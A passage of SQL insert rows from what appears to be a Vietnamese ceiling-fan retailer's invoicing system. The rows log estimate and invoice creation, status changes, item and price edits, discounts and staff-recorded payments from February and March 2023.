(1846, 'invoice', 262, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-17 16:32:24'),
(1847, 'invoice', 262, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:416:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm<br />\r\n- Đã bao gồm chi phí nhân công lắp đặt trần thạch cao, không bao gồm nguồn điện, xe nâng\";i:1;s:267:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: White   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\r\n\";}', '17', 'Loan Nguyễn', '2023-02-17 16:33:59'),
(1848, 'invoice', 262, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:303:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm<br />\r\n\";i:1;s:265:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: White   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-02-17 16:35:13'),
(1849, 'invoice', 262, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:97:\"Tính thêm chi phí gia cố khoảng cách từ trần thạch cao lên trần bê tông >40 cm\";i:1;s:97:\"Tính thêm chi phí gia cố khoảng cách từ trần thạch cao lên trần bê tông >30 cm\";}', '17', 'Loan Nguyễn', '2023-02-17 16:37:31'),
(1850, 'invoice', 262, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:97:\"Tính thêm chi phí gia cố khoảng cách từ trần thạch cao lên trần bê tông >30 cm\";i:1;s:85:\"Chi phí gia cố khoảng cách từ trần thạch cao lên trần bê tông >30 cm\";}', '17', 'Loan Nguyễn', '2023-02-17 16:51:39'),
(1851, 'invoice', 262, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"625000.00\";i:1;s:9:\"500000.00\";}', '17', 'Loan Nguyễn', '2023-02-18 09:10:43'),
(1852, 'estimate', 170, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-18 12:09:17'),
(1853, 'invoice', 263, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-18 12:09:40'),
(1854, 'estimate', 170, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/263\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-18 12:09:40'),
(1855, 'invoice', 263, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-18 12:10:03'),
(1856, 'invoice', 263, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-18 12:10:03'),
(1857, 'invoice', 263, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:62:\"Quạt trần công nghiệp SUNON Powerful S10 sải cánh 5m\";}', '17', 'Loan Nguyễn', '2023-02-18 12:27:09'),
(1858, 'invoice', 263, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:63:\"Quạt trần công nghiệp SUNON Powerful S10 sải cánh 5m5\";}', '17', 'Loan Nguyễn', '2023-02-18 12:27:09'),
(1859, 'invoice', 263, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2023-02-18 12:47:46'),
(1860, 'invoice', 262, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-18 14:45:44'),
(1861, 'invoice', 262, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.375.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/277\" target=\"_blank\">#277</a>\";}', '17', 'Loan Nguyễn', '2023-02-18 14:45:44'),
(1862, 'invoice', 261, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-18 14:46:21'),
(1863, 'invoice', 261, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.650.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/278\" target=\"_blank\">#278</a>\";}', '17', 'Loan Nguyễn', '2023-02-18 14:46:21'),
(1864, 'estimate', 171, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-20 16:02:26'),
(1865, 'invoice', 264, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-20 16:02:34'),
(1866, 'estimate', 171, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/264\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-20 16:02:34'),
(1867, 'invoice', 264, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-20 16:05:24'),
(1868, 'invoice', 264, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-20 16:05:24'),
(1869, 'invoice', 264, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-22 16:59:18'),
(1870, 'invoice', 264, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.375.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/279\" target=\"_blank\">#279</a>\";}', '17', 'Loan Nguyễn', '2023-02-22 16:59:18'),
(1871, 'estimate', 164, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-02-23 10:46:34'),
(1872, 'invoice', 258, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-02-23 12:28:28'),
(1873, 'invoice', 258, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.560.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/280\" target=\"_blank\">#280</a>\";}', '1', 'Ho Gia Phat', '2023-02-23 12:28:28'),
(1874, 'invoice', 263, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-02-23 12:29:03'),
(1875, 'invoice', 263, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"98.650.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/281\" target=\"_blank\">#281</a>\";}', '1', 'Ho Gia Phat', '2023-02-23 12:29:03'),
(1876, 'estimate', 172, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-23 13:51:36'),
(1877, 'invoice', 265, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-23 13:51:41'),
(1878, 'estimate', 172, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/265\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-23 13:51:41'),
(1879, 'invoice', 265, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-23 13:52:02'),
(1880, 'invoice', 265, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/282\" target=\"_blank\">#282</a>\";}', '17', 'Loan Nguyễn', '2023-02-23 13:52:02'),
(1881, 'estimate', 173, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-02-24 17:23:34'),
(1882, 'estimate', 174, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-02-25 17:31:52'),
(1883, 'invoice', 266, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-25 17:32:33'),
(1884, 'estimate', 174, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/266\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-02-25 17:32:33'),
(1885, 'invoice', 266, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-25 17:32:40'),
(1886, 'invoice', 266, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-25 17:32:40'),
(1887, 'invoice', 267, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-02-27 09:52:25'),
(1888, 'invoice', 267, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '17', 'Loan Nguyễn', '2023-02-27 10:12:19'),
(1889, 'invoice', 267, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-02-27 10:12:33'),
(1890, 'invoice', 267, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-02-27 10:12:33'),
(1891, 'estimate', 175, 'estimate_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-02-27 10:24:15'),
(1892, 'invoice', 267, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:39:\"Bộ điều khiển quạt CAVANI\r\nLED\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-02-27 13:41:52'),
(1893, 'estimate', 175, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>3</status>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-02-27 16:39:41'),
(1894, 'estimate', 176, 'estimate_activity_created', '', '18', 'Sương Võ', '2023-02-28 17:08:47'),
(1895, 'estimate', 176, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:25:\"Phí quản lý thi công\";}', '18', 'Sương Võ', '2023-02-28 17:20:53'),
(1896, 'estimate', 176, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:551:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China    <br />\r\n\";i:1;s:497:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: Gỗ sáng (Maple Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '18', 'Sương Võ', '2023-02-28 17:20:53'),
(1897, 'estimate', 176, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:66:\"Thi công lắp đặt đường dây điện cấp nguồn quạt\";}', '18', 'Sương Võ', '2023-02-28 17:20:53'),
(1898, 'estimate', 176, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '18', 'Sương Võ', '2023-02-28 17:20:53'),
(1899, 'estimate', 176, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:66:\"Thi công lắp đặt đường dây điện cấp nguồn quạt\";i:1;s:4:\"1.00\";i:2;s:1:\"3\";}', '18', 'Sương Võ', '2023-02-28 17:23:27'),
(1900, 'invoice', 268, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-02-28 20:40:41'),
(1901, 'invoice', 268, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:29:\"Bộ đèn LED Haiku L series\";}', '1', 'Ho Gia Phat', '2023-02-28 20:43:45'),
(1902, 'invoice', 268, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-02-28 20:44:28'),
(1903, 'estimate', 176, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5200000.00\";i:1;s:7:\"6500000\";}', '1', 'Ho Gia Phat', '2023-03-01 09:06:38'),
(1904, 'estimate', 176, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:6:\"800000\";}', '1', 'Ho Gia Phat', '2023-03-01 09:06:38'),
(1905, 'estimate', 176, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"500000.00\";i:1;s:9:\"850000.00\";}', '1', 'Ho Gia Phat', '2023-03-01 09:06:38'),
(1906, 'invoice', 269, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-03-01 12:49:27'),
(1907, 'estimate', 176, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/269\">INV-263-23</a>\";}', '1', 'Ho Gia Phat', '2023-03-01 12:49:27'),
(1908, 'invoice', 269, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '1', 'Ho Gia Phat', '2023-03-01 12:49:50'),
(1909, 'estimate', 177, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-03-01 13:39:30'),
(1910, 'invoice', 267, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-01 13:48:11'),
(1911, 'invoice', 267, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/283\" target=\"_blank\">#283</a>\";}', '17', 'Loan Nguyễn', '2023-03-01 13:48:11'),
(1912, 'invoice', 269, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:25:\"Phí quản lý thi công\";}', '18', 'Sương Võ', '2023-03-01 14:09:41'),
(1913, 'invoice', 269, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:14:\"Phí tăng ca \";i:1;s:51:\"Phí quản lí làm việc giới hạn: 7h - 10h \";}', '18', 'Sương Võ', '2023-03-01 14:20:04'),
(1914, 'invoice', 268, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-01 15:34:51'),
(1915, 'invoice', 268, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-03-01 15:34:51'),
(1916, 'invoice', 268, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-01 15:35:13'),
(1917, 'invoice', 268, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"30.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/284\" target=\"_blank\">#284</a>\";}', '17', 'Loan Nguyễn', '2023-03-01 15:35:13'),
(1918, 'estimate', 178, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-03-02 14:29:31'),
(1919, 'estimate', 179, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-03-02 14:39:33'),
(1920, 'estimate', 179, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2023-03-02 14:59:34'),
(1921, 'invoice', 270, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-03-02 14:59:42'),
(1922, 'estimate', 179, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/270\">INV-265-23</a>\";}', '1', 'Ho Gia Phat', '2023-03-02 14:59:42'),
(1923, 'invoice', 270, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '1', 'Ho Gia Phat', '2023-03-02 14:59:57'),
(1924, 'estimate', 178, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:465:\"Model: <br />\r\nSải cánh: 152cm (60 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Đem/Trắng <br />\r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA <br />\r\n\";i:1;s:414:\"Model: \r\nSải cánh: 152cm (60 inch), thiết kế sát trần (Low-Profile) \r\nThân màu: Đem/Trắng \r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao \r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) \r\nĐiều khiển 7 tốc độ đi kèm \r\nBộ đèn: Chưa bao gồm \r\nThương hiệu: Haiku/USA\";}', '1', 'Ho Gia Phat', '2023-03-02 15:00:21'),
(1925, 'estimate', 178, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2023-03-02 15:00:56'),
(1926, 'invoice', 271, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-03-02 15:01:04'),
(1927, 'estimate', 178, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/271\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2023-03-02 15:01:04'),
(1928, 'invoice', 271, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '1', 'Ho Gia Phat', '2023-03-02 15:01:18'),
(1929, 'invoice', 271, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:34:\"Haiku I 52 inch White with SenseME\";}', '1', 'Ho Gia Phat', '2023-03-02 15:03:37'),
(1930, 'invoice', 271, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:34:\"Haiku I 60 inch White with SenseME\";}', '1', 'Ho Gia Phat', '2023-03-02 15:03:37'),
(1931, 'estimate', 179, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '16', 'Phuc Dang', '2023-03-02 15:12:05'),
(1932, 'estimate', 178, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '16', 'Phuc Dang', '2023-03-02 15:13:37'),
(1933, 'estimate', 178, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:34:\"Haiku I 52 inch White with SenseME\";}', '16', 'Phuc Dang', '2023-03-02 15:15:57'),
(1934, 'estimate', 178, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:34:\"Haiku I 60 inch White with SenseME\";}', '16', 'Phuc Dang', '2023-03-02 15:15:57'),
(1935, 'estimate', 178, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"35000000.00\";i:1;s:11:\"36900000.00\";}', '16', 'Phuc Dang', '2023-03-02 15:21:04'),
(1936, 'invoice', 270, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-03-02 15:31:15'),
(1937, 'estimate', 179, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '16', 'Phuc Dang', '2023-03-02 15:34:24'),
(1938, 'invoice', 271, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Phuc Dang', '2023-03-02 15:36:15'),
(1939, 'invoice', 271, 'invoice_activity_marked_as_cancelled', '', '16', 'Phuc Dang', '2023-03-02 15:37:30'),
(1940, 'invoice', 271, 'invoice_activity_unmarked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-03-02 15:39:12'),
(1941, 'invoice', 272, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-03-03 18:59:15'),
(1942, 'estimate', 165, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:379:\"Sải cánh 152cm ( ~ 60inch)    <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W    <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)    <br />\r\nMàu thân quạt: Brush Nickel (Kẽm mạ INOX)    <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)    <br />\r\nTuỳ chọn đèn: N/A (không có)\";i:1;s:342:\"Sải cánh 152cm ( ~ 60inch)    \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W    \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)    \r\nMàu thân quạt: White (Kẽm mạ INOX)    \r\nMàu cánh: Gỗ sáng (Maple Wood)    \r\nTuỳ chọn đèn: N/A (không có)\";}', '17', 'Loan Nguyễn', '2023-03-06 09:28:59'),
(1943, 'invoice', 273, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-03-06 09:29:04'),
(1944, 'estimate', 165, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/273\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-03-06 09:29:04'),
(1945, 'invoice', 273, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-06 09:29:08'),
(1946, 'invoice', 273, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-03-06 09:29:08'),
(1947, 'invoice', 273, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-03-06 09:30:59'),
(1948, 'invoice', 272, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-06 09:32:52'),
(1949, 'invoice', 272, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-03-06 09:32:52'),
(1950, 'invoice', 266, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-06 09:33:32'),
(1951, 'invoice', 266, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/285\" target=\"_blank\">#285</a>\";}', '17', 'Loan Nguyễn', '2023-03-06 09:33:32'),
(1952, 'invoice', 272, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-06 09:34:39'),
(1953, 'invoice', 272, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.410.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/286\" target=\"_blank\">#286</a>\";}', '17', 'Loan Nguyễn', '2023-03-06 09:34:39'),
(1954, 'estimate', 180, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-03-06 15:30:43'),
(1955, 'invoice', 274, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-03-06 15:30:48'),
(1956, 'estimate', 180, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/274\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-03-06 15:30:48'),
(1957, 'invoice', 274, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-06 15:30:52'),
(1958, 'invoice', 274, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-03-06 15:30:52'),
(1959, 'invoice', 274, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-07 13:46:27'),
(1960, 'invoice', 274, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/287\" target=\"_blank\">#287</a>\";}', '17', 'Loan Nguyễn', '2023-03-07 13:46:27'),
(1961, 'invoice', 273, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-08 09:09:11'),
(1962, 'invoice', 273, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/288\" target=\"_blank\">#288</a>\";}', '17', 'Loan Nguyễn', '2023-03-08 09:09:11'),
(1963, 'estimate', 181, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-03-11 09:38:27'),
(1964, 'invoice', 275, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-03-11 09:38:32'),
(1965, 'estimate', 181, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/275\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-03-11 09:38:32'),
(1966, 'invoice', 275, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '17', 'Loan Nguyễn', '2023-03-11 09:38:53'),
(1967, 'invoice', 275, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-03-11 09:41:22'),
(1968, 'invoice', 275, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-03-11 09:41:22'),
(1969, 'invoice', 275, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"500000.00\";i:1;s:9:\"350000.00\";}', '17', 'Loan Nguyễn', '2023-03-11 09:50:49'),
(1970, 'invoice', 275, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";i:1;s:71:\"Nhân công lắp đặt quạt trần - Trần bê tông trực tiếp\";}', '17', 'Loan Nguyễn', '2023-03-11 09:51:36'),
(1971, 'invoice', 275, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"350000.00\";i:1;s:9:\"500000.00\";}', '17', 'Loan Nguyễn', '2023-03-11 09:56:02'),
(1972, 'invoice', 275, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood\";i:1;s:47:\"Quạt trần 5 cánh gỗ ABACUS 60 Maple Wood\";}', '17', 'Loan Nguyễn', '2023-03-11 17:11:25'),
